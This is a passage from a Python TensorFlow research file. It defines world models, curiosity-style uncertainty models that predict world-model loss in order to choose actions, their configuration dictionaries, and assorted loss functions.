            s_i = feedforward_conv_loop(s_i, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
            s_f = feedforward_conv_loop(s_f, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = True, batch_normalize = False, no_nonlinearity_end = False)[-1]
        self.encoding_i = s_i
        self.encoding_f = s_f
        enc_i_flat = flatten(s_i)
        enc_f_flat = flatten(s_f)
        act_flat = flatten(self.action)
        act_loss_factor = cfg['action_model'].get('loss_factor', 1.)
        fut_loss_factor = cfg['future_model'].get('loss_factor', 1.)
        #action model time
        with tf.variable_scope('action_model'):
            loss_type = cfg['action_model'].get('loss_type', 'both_l2')
            include_prev_action = cfg['action_model'].get('include_previous_action', False)
            to_concat = [enc_i_flat, enc_f_flat]
            if include_prev_action:
                print('including previous action!')
                to_concat.append(self.action[:, 0])
            encoded_concat = tf_concat(to_concat, 1)
            self.act_pred = hidden_loop_with_bypasses(encoded_concat, m, cfg['action_model']['mlp'], reuse_weights = False, train = True)
            if loss_type == 'both_l2':
                # L2 against the full (flattened) post-action sequence
                act_post_flat = flatten(self.action_post)
                diff = self.act_pred - act_post_flat
                self.act_loss_per_example = tf.reduce_sum(diff * diff, axis = 1, keep_dims = True) / 2. * act_loss_factor
                self.act_loss = tf.reduce_mean(self.act_loss_per_example)
            elif loss_type == 'one_l2':
                # L2 against only the last action
                act_post_flat = self.action_post[:, -1]
                diff = self.act_pred - act_post_flat
                self.act_loss_per_example = tf.reduce_sum(diff * diff, axis = 1, keep_dims = True) / 2. * act_loss_factor
                self.act_loss = tf.reduce_mean(self.act_loss_per_example)
            elif loss_type == 'one_cat':
                print('cat')
                # softmax classification of the (discretized) last action
                num_classes = cfg['action_model']['num_classes']
                act_post_flat = self.action_post[:, -1]
                self.act_loss_per_example, self.act_loss = action_softmax_loss(self.act_pred, act_post_flat, num_classes = num_classes)
            else:
                raise Exception('loss type not recognized!')
        #future model time
        enc_shape = enc_f_flat.get_shape().as_list()
        with tf.variable_scope('future_model'):
            fut_input = tf_concat([enc_i_flat, act_flat], 1)
            forward = hidden_loop_with_bypasses(fut_input, m, cfg['future_model']['mlp'], reuse_weights = False, train = True)
            if 'deconv' in cfg['future_model']:
                # hourglass variant: reshape the MLP output to a spatial map and
                # deconvolve (with bypasses from the given-state encoding)
                reshape_dims = cfg['future_model']['reshape_dims']
                forward = tf.reshape(forward, [-1] + reshape_dims)
                decoding = deconv_loop(
                    forward, m, cfg['future_model']['deconv'], desc='deconv',
                    bypass_nodes = [self.encoding_i], reuse_weights = False,
                    batch_normalize = False,
                    do_print = True)
                self.fut_pred = decoding[-1]
                tv_flat = flatten(self.encoding_f)
            else:
                self.fut_pred = forward
                tv_flat = enc_f_flat
            #different formula for l2 loss now because we need per-example details
            pred_flat = flatten(self.fut_pred)
            diff = pred_flat - tv_flat
            self.fut_loss_per_example = tf.reduce_sum(diff * diff, axis = 1, keep_dims = True) / 2. * fut_loss_factor
            self.fut_loss = tf.reduce_mean(self.fut_loss_per_example)
        self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name]
        self.fut_var_list = [var for var in tf.global_variables() if 'future_model' in var.name]
        self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
# Config for LatentSpaceWorldModel with an 'hourglass' future model:
# a 4-layer conv encoder down to 8 channels, an action-prediction MLP, and a
# future model whose MLP output is reshaped to [4, 4, 8] and deconvolved
# (with bypasses) back toward the encoding resolution.
hourglass_latent_model_cfg = {
    'state_shape' : [2, 64, 64, 3],  # (timesteps, H, W, C)
    'action_shape' : [2, 8],         # (timesteps, action_dim)
    'encode' : {
        'encode_depth' : 4,
        'encode' : {
            1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            4: {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}}
        }
    },
    'action_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 256},
                2: {'num_features' : 16, 'activation' : 'identity'}
            }
        }
    },
    'future_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 256},
                2: {'num_features' : 128, 'activation' : 'identity'}
            }
        },
        # MLP output (128 features) reshaped to this spatial map before deconv
        'reshape_dims' : [4, 4, 8],
        'deconv' : {
            'deconv_depth' : 3,
            'deconv' : {
                1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 16}, 'bypass' : 0},
                2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 16}, 'bypass' : 0},
                3 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}, 'bypass' : 0}
            }
        }
    }
}
# Config for LatentSpaceWorldModel without a deconv head: the future model
# predicts the flattened future encoding directly with a 2-layer MLP.
mario_world_model_config = {
    'state_shape' : [2, 64, 64, 3],  # (timesteps, H, W, C)
    'action_shape' : [2, 8],         # (timesteps, action_dim)
    'encode' : {
        'encode_depth' : 4,
        'encode' : {
            1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
            4: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}}
        }
    },
    'action_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 256},
                2: {'num_features' : 16, 'activation' : 'identity'}
            }
        }
    },
    'future_model' : {
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {
                1: {'num_features' : 512},
                2: {'num_features' : 512, 'activation' : 'identity'}
            }
        }
    }
}
class MixedUncertaintyModel:
    '''For both action and future uncertainty prediction, simultaneously, as separate predictions.
    Consider merging with UncertaintyModel, but right now that might look too messy. Want to leave that functionality alone.
    '''
    def __init__(self, cfg):
        """Build the graph: encode the state, tile it across sampled actions,
        and run two MLP heads ('act_mlp', 'fut_mlp') over the shared
        encoding+action features to estimate the action and future losses.
        """
        with tf.variable_scope('uncertainty_model'):
            self.s_i = x = tf.placeholder(tf.float32, [None] + cfg['state_shape'])
            self.action_sample = ac = tf.placeholder(tf.float32, [None, cfg['action_dim']])
            # targets: true world-model losses, fed in per example
            self.true_act_loss = tf.placeholder(tf.float32, [None])
            self.true_fut_loss = tf.placeholder(tf.float32, [None])
            m = ConvNetwithBypasses()
            x = postprocess_depths(x)
            #concat temporal dims into channels
            x = tf_concat([x[:, i] for i in range(cfg['state_shape'][0])], 3)
            self.encoded = x = feedforward_conv_loop(x, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
            x = flatten(x)
            # when scoring n_action_samples candidate actions for one state,
            # tile the single state encoding so every candidate shares it
            x = tf.cond(tf.equal(tf.shape(self.action_sample)[0], cfg['n_action_samples']), lambda : tf.tile(x, [cfg['n_action_samples'], 1]), lambda : x)
            fc_inputs = tf_concat([x, ac], 1)
            self.estimated_act_loss = hidden_loop_with_bypasses(fc_inputs, m, cfg['act_mlp'], reuse_weights = False, train = True)
            # BUG FIX: was `fc_inpits` (NameError at graph construction);
            # both heads read the same encoding+action features.
            self.estimated_fut_loss = hidden_loop_with_bypasses(fc_inputs, m, cfg['fut_mlp'], reuse_weights = False, train = True)
            #TODO FINISH
def get_mixed_loss(world_model, weighting, multistep = False):
    """Combine a world model's action and future losses into one weighted signal.

    :param world_model: object exposing act_loss_per_example / fut_loss_per_example
        (scalars/tensors, or lists of them when multistep)
    :param weighting: dict with 'action' and 'future' coefficients
    :param multistep: if True, combine the two loss lists elementwise
    :return: weighted loss (or list of per-step weighted losses)
    """
    print(weighting.keys())
    print('in the loss maker!')
    print(world_model.act_loss_per_example)
    print(world_model.fut_loss_per_example)
    w_act = weighting['action']
    w_fut = weighting['future']
    act_losses = world_model.act_loss_per_example
    fut_losses = world_model.fut_loss_per_example
    if multistep:
        return [w_act * a + w_fut * f for a, f in zip(act_losses, fut_losses)]
    return w_act * act_losses + w_fut * fut_losses
def get_obj_there(world_model):
    """Loss-signal selector: the world model's object-presence tensor."""
    return getattr(world_model, 'obj_there')
def get_force_square(world_model):
    """Loss-signal selector: the world model's squared-force-magnitude tensor."""
    return getattr(world_model, 'square_force_magnitude')
class ObjectThereWorldModel:
    '''
    A dummy oracle world model that just says the true value of whether an object is in the field of view.
    Builds only placeholders: no learned parameters, no loss graph.
    '''
    def __init__(self, cfg):
        print(cfg.keys())
        base_shape = list(cfg['state_shape'])
        # one extra timestep so the stack covers both given and future frames
        padded_shape = [base_shape[0] + 1] + base_shape[1:]
        self.states = tf.placeholder(tf.float32, [None] + padded_shape)
        # given frames (all but last) and future frames (all but first)
        self.s_i = self.states[:, :-1]
        self.s_f = self.states[:, 1:]
        self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
        # fed-in ground-truth object-presence labels
        self.obj_there = tf.placeholder(tf.int32, [None])
class ForceMagSquareWorldModel:
    '''
    Similar to the above, but just gives the square of the force: the 'loss'
    signal is half the squared magnitude of the force part of the last action.
    '''
    def __init__(self, cfg):
        frame_shape = list(cfg['state_shape'])
        # one extra timestep so the stack covers both given and future frames
        frame_shape[0] = frame_shape[0] + 1
        self.states = tf.placeholder(tf.float32, [None] + frame_shape)
        self.s_i = self.states[:, :-1]
        self.s_f = self.states[:, 1:]
        self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
        self.action_post = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
        # dims 2+ of the final post-action are treated as the force components
        last_force = self.action_post[:, -1, 2:]
        self.square_force_magnitude = tf.reduce_sum(last_force * last_force, axis = 1, keep_dims = True) / 2.
class SimpleForceUncertaintyModel:
    """Hand-crafted uncertainty model for the squared-force oracle.

    Features are (object presence) * action^2; a small MLP (or the raw force
    sum when cfg['use_ans']) regresses the oracle's squared-force signal.
    act() ignores the estimate and picks uniformly at random.
    """
    def __init__(self, cfg, world_model):
        with tf.variable_scope('uncertainty_model'):
            m = ConvNetwithBypasses()
            self.action_sample = ac = world_model.action[:, -1]
            self.true_loss = world_model.square_force_magnitude
            self.obj_there = tf.placeholder(tf.int32, [None])
            presence = tf.expand_dims(tf.cast(self.obj_there, tf.float32), 1)
            # zero the squared action wherever no object is present
            self.oh_my_god = feats = presence * ac * ac
            # precomputed answer: summed squared force components (dims 2+)
            self.ans = tf.reduce_sum(feats[:, 2:], axis = 1)
            if cfg.get('use_ans', False):
                feats = tf.expand_dims(self.ans, 1)
            self.estimated_world_loss = tf.squeeze(hidden_loop_with_bypasses(feats, m, cfg, reuse_weights = False, train = True))
            self.uncertainty_loss = l2_loss(self.true_loss, self.estimated_world_loss, {'loss_factor' : 1 / 32.})
        self.rng = np.random.RandomState(0)
        self.var_list = [var for var in tf.global_variables() if 'uncertainty_model' in var.name]

    def act(self, sess, action_sample, state):
        """Uniformly random action; returns (action, -1., None)."""
        idx = self.rng.randint(len(action_sample))
        return action_sample[idx], -1., None
def objthere_signal(world_model):
    """Loss-signal selector: the world model's object-presence supervision tensor."""
    return getattr(world_model, 'obj_there_supervision')
class MSExpectedUncertaintyModel:
    """Uncertainty ('curiosity') model for a multi-step world model.

    For each future timestep it predicts a softmax over binned world-model
    loss given (encoded state, candidate action), and samples among candidate
    actions in proportion to the total expected bin index divided by a
    temperature ('heat'). Also builds object-there/not-there diagnostic
    readouts keyed off the world model's object_there[0] labels.
    """
    def __init__(self, cfg, world_model):
        with tf.variable_scope('uncertainty_model'):
            # step counter owned by this model (drives heat schedules)
            self.step = tf.get_variable('um_step', [], tf.int32, initializer = tf.constant_initializer(0,dtype = tf.int32))
            m = ConvNetwithBypasses()
            self.s_i = x = world_model.s_i
            # training target: custom loss readout if configured, else the
            # world model's per-example action losses
            if 'loss_signal_func' in cfg:
                self.true_loss = cfg['loss_signal_func'](world_model, **cfg['loss_signal_kwargs'])
            else:
                self.true_loss = world_model.act_loss_per_example
            n_timesteps = len(world_model.act_loss_per_example)
            t_per_state = self.s_i.get_shape().as_list()[1]
            #the action it decides on is the first action giving a transition from the starting state.
            self.action_sample = ac = world_model.action_for_um
            #should also really include some past actions
            #encoding
            x = tf.cast(x, tf.float32)
            postprocess_method = cfg.get('postprocess')
            if postprocess_method == 'depths1':
                x = postprocess_depths(x)
            elif postprocess_method == 'images1':
                print('POSTPROCESSING AS IMAGES')
                x = postprocess_std(x)
            else:
                assert postprocess_method is None
            # fold the temporal dimension into channels
            x = tf_concat([x[:, i] for i in range(t_per_state)], 3)
            if cfg.get('use_wm_encoding', False):
                # reuse the world model's own encoding instead of learning one
                self.encoded = world_model.encoding_for_um
            else:
                self.encoded = x = feedforward_conv_loop(x, m, cfg['shared_encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
            #choke down
            x = flatten(x)
            with tf.variable_scope('before_action'):
                x = hidden_loop_with_bypasses(x, m, cfg['shared_mlp_before_action'], reuse_weights = False, train = True)
            #if we are computing the uncertainty map for many action samples, tile to use the same encoding for each action
            x = tf.cond(tf.equal(tf.shape(self.action_sample)[0], cfg['n_action_samples']), lambda : tf.tile(x, [cfg['n_action_samples'], 1]), lambda : x)
            #concatenate action
            x = tf_concat([x, ac], 1)
            #shared mlp after action
            if 'shared_mlp' in cfg:
                with tf.variable_scope('shared_mlp'):
                    x = hidden_loop_with_bypasses(x, m, cfg['shared_mlp'], reuse_weights = False, train = True)
            #split mlp per prediction
            self.estimated_world_loss = []
            for t in range(n_timesteps):
                with tf.variable_scope('split_mlp' + str(t)):
                    self.estimated_world_loss.append(hidden_loop_with_bypasses(x, m, cfg['mlp'][t], reuse_weights = False, train = True))
            self.loss_per_example, self.loss_per_step, self.uncertainty_loss = cfg['loss_func'](self.true_loss, self.estimated_world_loss, cfg)
            #for now, just implementing a random policy
            self.just_random = False
            if 'just_random' in cfg:
                self.just_random = True
                self.rng = np.random.RandomState(cfg['just_random'])
            self.var_list = [var for var in tf.global_variables() if 'uncertainty_model' in var.name]
            #a first stab at a policy based on this uncertainty estimation
            if cfg.get('weird_old_score', False):
                # legacy score: expectation taken over raw logits, not softmax probs.
                # NOTE(review): this branch never defines probs_per_timestep, which the
                # readout loop below uses — likely NameError when 'weird_old_score' is
                # set together with object_there readouts; confirm before enabling.
                tot_est = sum(self.estimated_world_loss)
                tot_est_shape = tot_est.get_shape().as_list()
                assert len(tot_est_shape) == 2
                n_classes = tot_est_shape[1]
                expected_tot_est = sum([tot_est[:, i:i+1] * float(i) for i in range(n_classes)])
            else:
                probs_per_timestep = [tf.nn.softmax(logits) for logits in self.estimated_world_loss]
                n_classes = probs_per_timestep[0].get_shape().as_list()[-1]
                # expected bin index per timestep, summed into one curiosity score
                expected_class_per_timestep = [sum([probs[:, i:i+1] * float(i) for i in range(n_classes)]) for probs in probs_per_timestep]
                expected_tot_est = sum(expected_class_per_timestep)
            #heat setup
            if 'heat_func' in cfg:
                assert 'heat' not in cfg
                heat = cfg['heat_func'](self.step, ** cfg['heat_params'])
            else:
                heat = tf.constant(cfg.get('heat', 1.), dtype = tf.float32)
            x = tf.transpose(expected_tot_est) / heat
            self.sample = categorical_sample(x, cfg['n_action_samples'], one_hot = False)
            #add readouts
            self.obj_there_avg_pred = []
            self.obj_not_there_avg_pred = []
            self.obj_there_loss = []
            self.obj_not_there_loss = []
            #only care about if object is there the first time
            obj_there = tf.tile(world_model.object_there[0], [1, n_classes])
            obj_there_for_per_example_case = tf.squeeze(world_model.object_there[0])
            for t in range(n_timesteps):
                self.obj_there_avg_pred.append(float(n_classes) * tf.reduce_sum(obj_there * probs_per_timestep[t], axis = 0) / tf.reduce_sum(obj_there))
                self.obj_not_there_avg_pred.append(float(n_classes) * tf.reduce_sum((1. - obj_there)\
                        * probs_per_timestep[t], axis = 0) / tf.reduce_sum(1. - obj_there))
                self.obj_there_loss.append(tf.reduce_sum(obj_there_for_per_example_case * self.loss_per_example[t]) / tf.reduce_sum(obj_there_for_per_example_case))
                self.obj_not_there_loss.append(tf.reduce_sum((1. - obj_there_for_per_example_case)\
                        * self.loss_per_example[t]) / tf.reduce_sum(1. - obj_there_for_per_example_case))
            self.readouts = {'estimated_world_loss' : self.estimated_world_loss, 'um_loss' : self.uncertainty_loss,
                'loss_per_example' : self.true_loss, 'obj_not_there_avg_pred_noprint' : self.obj_not_there_avg_pred,
                'obj_there_avg_pred_noprint' : self.obj_there_avg_pred, 'um_action_given' : self.action_sample,
                'um_obj_there_loss_noprint' : self.obj_there_loss, 'um_obj_not_there_loss_noprint' : self.obj_not_there_loss, 'heat' : heat}
            for j, l in enumerate(self.loss_per_step):
                self.readouts['um_loss' + str(j)] = l
            self.save_to_gfs = ['estimated_world_loss', 'loss_per_example', 'um_action_given']

    def act(self, sess, action_sample, state):
        """Pick an action from action_sample; returns (action, -1., estimated losses)."""
        #this should eventually implement a policy, for now uniformly random, but we still want that sweet estimated world loss.
        depths_batch = np.array([state])
        if self.just_random:
            ewl = sess.run(self.estimated_world_loss, feed_dict = {self.s_i : depths_batch, self.action_sample : action_sample})
            chosen_idx = self.rng.randint(len(action_sample))
            return action_sample[chosen_idx], -1., ewl
        chosen_idx, ewl = sess.run([self.sample, self.estimated_world_loss], feed_dict = {self.s_i : depths_batch, self.action_sample : action_sample})
        chosen_idx = chosen_idx[0]
        act = action_sample[chosen_idx]
        return act, -1., ewl
def stopping_exponential_decay(step, start_value = 1000., end_value = 5e-1, time_to_get_there = 100000):
    """Exponential decay from start_value to end_value over time_to_get_there
    steps (log-linear interpolation), clamped at end_value afterwards.

    :param step: integer step tensor/variable
    :return: float32 scalar tensor
    """
    progress = tf.cast(step, tf.float32) / float(time_to_get_there)
    log_interp = np.log(start_value) * (1. - progress) + np.log(end_value) * progress
    return tf.maximum(tf.exp(log_interp), end_value)
class UncertaintyModel:
    """Single-step uncertainty ('curiosity') model.

    Learns to predict a world model's per-example loss from
    (encoded state, candidate action); actions are then sampled with
    probability proportional to softmax(predicted loss / heat).
    Supports oracle variants that feed in object presence directly.
    """
    def __init__(self, cfg, world_model):
        um_scope = cfg.get('scope_name', 'uncertainty_model')
        with tf.variable_scope(um_scope):
            m = ConvNetwithBypasses()
            # candidate action = last action in the world model's action window
            self.action_sample = ac = world_model.action[:, -1]
            self.s_i = x = world_model.s_i
            if cfg.get('only_model_ego', False):
                # keep only the first two (ego-motion) action dimensions
                ac = ac[:, :2]
            # regression target: the world model's per-example loss readout
            self.true_loss = tr_loss = cfg['wm_loss']['func'](world_model, **cfg['wm_loss']['kwargs'])
            print('true loss here')
            print(self.true_loss)
            print(cfg['wm_loss']['func'])
            assert len(self.true_loss.get_shape().as_list()) == 2
            if cfg.get('use_world_encoding', False):
                # reuse the world model's own state encoding
                self.encoded = x = world_model.encoding_i
            else:
                x = self.s_i
                x = postprocess_depths(x)
                #concatenate temporal dimension into channels
                x = tf_concat([x[:, i] for i in range(x.get_shape().as_list()[1])], 3)
                #encode
                self.encoded = x = feedforward_conv_loop(x, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
            x = flatten(x)
            #this could be done fully conv, but we would need building blocks modifications, this is just as easy
            #applies an mlp to encoding before adding in actions
            if 'mlp_before_action' in cfg:
                with tf.variable_scope('before_action'):
                    print('got to before action!')
                    x = hidden_loop_with_bypasses(x, m, cfg['mlp_before_action'], reuse_weights = False, train = True)
            # when scoring n_action_samples candidate actions, tile the single
            # state encoding so every candidate shares it
            x = tf.cond(tf.equal(tf.shape(self.action_sample)[0], cfg['n_action_samples']), lambda : tf.tile(x, [cfg['n_action_samples'], 1]), lambda : x)
            # x = tf.tile(x, [cfg['n_action_samples'], 1])
            self.insert_obj_there = cfg.get('insert_obj_there', False)
            if self.insert_obj_there:
                # oracle variant: replace the learned encoding with a fed-in
                # object-presence indicator
                print('inserting obj_there')
                self.obj_there = x = tf.placeholder(tf.int32, [None])
                x = tf.cast(x, tf.float32)
                x = tf.expand_dims(x, 1)
            self.exactly_whats_needed = cfg.get('exactly_whats_needed', False)
            if self.insert_obj_there and self.exactly_whats_needed:
                # hand-crafted feature: presence * action^2
                print('exactly_whats_needed nonlinearity')
                self.oh_my_god = x = x * ac * ac
                print(x.get_shape().as_list())
            else:
                x = tf_concat([x, ac], 1)
            print('going into last hidden loop')
            self.estimated_world_loss = x = hidden_loop_with_bypasses(x, m, cfg['mlp'], reuse_weights = False, train = True)
            x_tr = tf.transpose(x)
            heat = cfg.get('heat', 1.)
            x_tr /= heat
            #need to think about how to handle this
            if x_tr.get_shape().as_list()[0] > 1:
                # multi-output head: sample using only the second row of logits
                x_tr = x_tr[1:2]
            prob = tf.nn.softmax(x_tr)
            log_prob = tf.nn.log_softmax(x_tr)
            self.entropy = - tf.reduce_sum(prob * log_prob)
            self.sample = categorical_sample(x_tr, cfg['n_action_samples'], one_hot = False)
            print('true loss!')
            print(self.true_loss)
            self.uncertainty_loss = cfg['loss_func'](self.true_loss, self.estimated_world_loss, cfg)
            self.just_random = False
            if 'just_random' in cfg:
                self.just_random = True
                self.rng = np.random.RandomState(cfg['just_random'])
            self.var_list = [var for var in tf.global_variables() if um_scope in var.name]
            print([var.name for var in self.var_list])

    def act(self, sess, action_sample, state):
        """Choose an action from action_sample; returns
        (action, entropy, estimated per-action losses) — or (action, -1., None)
        for the random+oracle shortcut, which skips the session call entirely.
        """
        if self.just_random and self.insert_obj_there:
            #a bit hackish, hopefully breaks nothing
            chosen_idx = self.rng.randint(len(action_sample))
            return action_sample[chosen_idx], -1., None
        depths_batch = np.array([state])
        chosen_idx, entropy, estimated_world_loss = sess.run([self.sample, self.entropy, self.estimated_world_loss],
                feed_dict = {self.s_i : depths_batch, self.action_sample : action_sample})
        chosen_idx = chosen_idx[0]
        if self.just_random:
            chosen_idx = self.rng.randint(len(action_sample))
        return action_sample[chosen_idx], entropy, estimated_world_loss
def l2_loss(tv, pred, cfg):
    """Scaled L2 loss between target `tv` and prediction `pred`
    (factor from cfg['loss_factor'], default 1)."""
    scale = cfg.get('loss_factor', 1.)
    return scale * tf.nn.l2_loss(tv - pred)
def categorical_loss(tv, pred, cfg):
    """Mean sparse softmax cross-entropy of logits `pred` against integer
    labels `tv`, scaled by cfg['loss_factor'] (default 1)."""
    xent = tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels = tv, logits = pred)
    return tf.reduce_mean(xent) * cfg.get('loss_factor', 1.)
def correlation(x, y):
    """Pearson correlation of two tensors, flattened to vectors.

    Both numerator and denominator carry a +1e-4 smoothing term to avoid
    division by zero on constant inputs.
    """
    x = tf.reshape(x, (-1,))
    y = tf.reshape(y, (-1,))
    count = tf.cast(tf.shape(x)[0], tf.float32)
    sum_x = tf.reduce_sum(x)
    sum_y = tf.reduce_sum(y)
    sum_xy = tf.reduce_sum(tf.multiply(x, y))
    sum_xx = tf.reduce_sum(tf.pow(x, 2))
    sum_yy = tf.reduce_sum(tf.pow(y, 2))
    num = tf.scalar_mul(count, sum_xy) - tf.scalar_mul(sum_x, sum_y) + .0001
    den = tf.sqrt(tf.scalar_mul(tf.scalar_mul(count, sum_xx) - tf.pow(sum_x, 2),
                                tf.scalar_mul(count, sum_yy) - tf.pow(sum_y, 2))) + .0001
    return tf.truediv(num, den)
def combination_loss(tv, pred, cfg):
    """L2 loss plus a correlation-maximizing penalty:
    l2_factor * L2(pred, tv) - corr_factor * (corr(pred, tv) - 1)."""
    l2_term = cfg.get('l2_factor', 1.) * tf.nn.l2_loss(pred - tv)
    corr_term = cfg.get('corr_factor', 1.) * (correlation(pred, tv) - 1)
    return l2_term - corr_term
def bin_values(values, thresholds):
    """Discretize `values` into integer class labels.

    Each element's label is the number of thresholds it exceeds, so
    `len(thresholds)` cut points yield classes 0..len(thresholds).

    :param values: float tensor
    :param thresholds: iterable of cut points (ascending for meaningful bins)
    :return: int32 tensor shaped like `values`
    Bug fix: an empty `thresholds` previously raised NameError (the
    accumulator was only created inside the loop); now it yields all zeros.
    """
    labels = tf.zeros_like(values, dtype = tf.int32)
    for th in thresholds:
        labels += tf.cast(tf.greater(values, th), tf.int32)
    return labels
def binned_softmax_loss_per_example(tv, prediction, cfg):
    """Softmax cross-entropy over binned targets, averaged across target dims.

    Targets [batch, d] are binned with cfg['thresholds']; predictions are
    reshaped to [batch, d, n_classes] logits.
    :return: (per-example loss [batch, 1], scalar mean loss)
    """
    thresholds = cfg['thresholds']
    num_bins = len(thresholds) + 1
    target_shape = tv.get_shape().as_list()
    dims = target_shape[1]
    assert len(target_shape) == 2
    labels = bin_values(tv, thresholds)
    logits = tf.reshape(prediction, [-1, dims, num_bins])
    per_dim = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = labels, logits = logits) * cfg.get('loss_factor', 1.)
    per_example = tf.reduce_mean(per_dim, axis = 1, keep_dims = True)
    print('per example!')
    print(per_example.get_shape().as_list())
    return per_example, tf.reduce_mean(per_example)
def binned_01_accuracy_per_example(tv, prediction, cfg):
    """0/1 accuracy of binned predictions, per example and target dimension.

    Targets [batch, d] are binned with cfg['thresholds']; predictions are
    reshaped to [batch, d, n_classes] and argmaxed over classes.
    :return: int32 tensor [batch, d] with 1 where the argmax matches the bin
    """
    thresholds = cfg['thresholds']
    num_bins = len(thresholds) + 1
    target_shape = tv.get_shape().as_list()
    dims = target_shape[1]
    assert len(target_shape) == 2
    labels = bin_values(tv, thresholds)
    logits = tf.reshape(prediction, [-1, dims, num_bins])
    predicted_class = tf.cast(tf.argmax(logits, axis = -1), tf.int32)
    return tf.cast(tf.equal(predicted_class, labels), tf.int32)
def binned_softmax_loss_per_example_w_weights(tv, prediction, cfg):
    """Binned softmax cross-entropy with a per-target-dimension weight.

    Like binned_softmax_loss_per_example, but each target dimension's
    cross-entropy is multiplied by cfg['loss_weights'][dim] before the
    across-dims average.
    :return: (per-example loss, scalar mean loss)
    """
    thresholds = cfg['thresholds']
    loss_weights = cfg['loss_weights']
    print('using softmax loss with weights')
    print(loss_weights)
    num_bins = len(thresholds) + 1
    target_shape = tv.get_shape().as_list()
    dims = target_shape[1]
    assert len(target_shape) == 2
    labels = bin_values(tv, thresholds)
    logits = tf.reshape(prediction, [-1, dims, num_bins])
    factor = cfg.get('loss_factor', 1.)
    weighted_terms = []
    for k in range(dims):
        xent = tf.nn.sparse_softmax_cross_entropy_with_logits(
            labels = labels[:, k : k + 1], logits = logits[:, k : k + 1])
        weighted_terms.append(xent * factor * loss_weights[k])
    loss_per_example = sum(weighted_terms) / float(dims)
    loss = tf.reduce_mean(loss_per_example)
    return loss_per_example, loss
def binned_softmax_loss(tv, prediction, cfg):
    """Softmax cross-entropy over binned scalar targets.

    Targets are binned with cfg['thresholds'] and squeezed to a label vector;
    `prediction` supplies the logits.
    :return: (per-example loss, scaled scalar mean loss)
    """
    labels = tf.squeeze(bin_values(tv, cfg['thresholds']))
    per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = labels, logits = prediction)
    mean_loss = tf.reduce_mean(per_example) * cfg.get('loss_factor', 1.)
    return per_example, mean_loss
def softmax_loss(tv, prediction, cfg):
    """Sparse softmax cross-entropy on already-integer targets.

    :return: (per-example loss, scaled scalar mean loss)
    """
    labels = tf.squeeze(tv)
    print('in loss func')
    print(labels)
    per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = labels, logits = prediction)
    mean_loss = tf.reduce_mean(per_example) * cfg.get('loss_factor', 1.)
    return per_example, mean_loss
def ms_sum_binned_softmax_loss(tv, prediction, cfg):
    """Multi-step binned softmax loss: one binned_softmax_loss per timestep.

    :param tv: list of per-step targets
    :param prediction: list of per-step logits (same length)
    :return: (per-example losses per step, scalar loss per step, overall mean)
    """
    assert len(tv) == len(prediction)
    per_example = []
    per_step = []
    for step_tv, step_pred in zip(tv, prediction):
        lpe, lps = binned_softmax_loss(step_tv, step_pred, cfg)
        per_example.append(lpe)
        per_step.append(lps)
    return per_example, per_step, tf.reduce_mean(per_step)
def objthere_loss(tv, prediction, cfg):
    """Object-presence classification loss for a single-timestep prediction.

    `prediction` must be a one-element list of logits; returns the same
    (per-example list, per-step list, overall mean) triple shape as the
    multi-step losses so the two are interchangeable.
    """
    assert len(prediction) == 1
    print('in objthere loss')
    print(tv)
    lpe, lps = softmax_loss(tv, prediction[0], cfg)
    loss_per_example = [lpe]
    loss_per_step = [lps]
    return loss_per_example, loss_per_step, tf.reduce_mean(loss_per_step)
def equal_spacing_softmax_loss(tv, prediction, cfg):
    """Softmax loss after mapping continuous targets onto equally spaced bins.

    Targets in [min_value, max_value] are linearly rescaled to
    [0, num_classes - 1], truncated to ints, and used as labels against the
    `prediction` logits.
    :return: scaled scalar mean loss
    """
    num_classes = cfg.get('num_classes', 2)
    min_value = cfg.get('min_value', -1.)
    max_value = cfg.get('max_value', 1.)
    tv_shape = tv.get_shape().as_list()
    pred = prediction
    tv = float(num_classes - 1) * (tv - min_value) / (max_value - min_value)
    print('squeezing')
    print(tv)
    labels = tf.squeeze(tf.cast(tv, tf.int32))
    print(labels)
    print(pred)
    per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels = labels, logits = pred)
    return tf.reduce_mean(per_example) * cfg.get('loss_factor', 1.)
# Small end-to-end config: a depth-future world model paired with a
# 3-conv-layer uncertainty model scoring 50 sampled actions per state.
sample_cfg = {
    'uncertainty_model' : {
        'state_shape' : [2, 64, 64, 3],  # (timesteps, H, W, C)
